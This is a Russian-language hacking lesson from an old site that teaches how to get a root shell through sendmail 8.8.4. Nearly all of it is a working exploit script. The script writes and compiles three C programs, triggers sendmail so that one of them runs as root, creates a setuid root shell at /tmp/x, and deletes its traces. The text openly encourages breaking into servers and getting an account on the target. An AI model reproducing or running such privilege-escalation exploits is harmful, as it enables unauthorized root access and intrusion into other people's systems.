2211
| ЗНАКОМСТВА | UKA.ru | Gossip.ru |Библиотека бесплатно! | massovka | vaticancitystate.ru | взрывЧАТка From 24.11.97
Lesson 018
----------

Цель: sendmail v.8.8.4 - получение root shell.

Exploйtы являются лучшим способом для взлома серверов, но они также гораздо
сложней чем взлом основанный на ftp или технике phf ;)
Очень желательно иметь account на сервере вашей цели (если это возможно) 
и смотреть за происходящим изнутри ;). Данные exploйts вызывают ошибки или баги
(может быть фичи ;) которые могут дать root вход. 

Этот exploйt известен как Sendmail v.8.8.4
Он создает suid програму /tmp/x которая вызывает оболочку как root. Ниже при-
ведено описание как ей воспользоваться:

cat << _EOF_ >/tmp/x.c
 #define RUN "/bin/ksh"
 #include
 main()
 {
    execl(RUN,RUN,NULL);
 }
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
 main()
 {
   execl("/usr/lib/sendmail","/tmp/smtpd",0);      
 }                                             
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
 main()
 {
   setuid(0); setgid(0); 
   system("chown root /tmp/x ;chmod 4755 /tmp/x");
 }
_EOF_
#
#
gcc -O  -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
   echo "leet..."
   /tmp/x
fi 

PS. Thanx to Psychotic and Sean B. HamorЕFor

123123
| ЗНАКОМСТВА | UKA.ru | Gossip.ru | lib.uka.ru | Flash memory: SD, MMC, miniSD, CF | взрывЧАТка From 24.11.97
uka.ru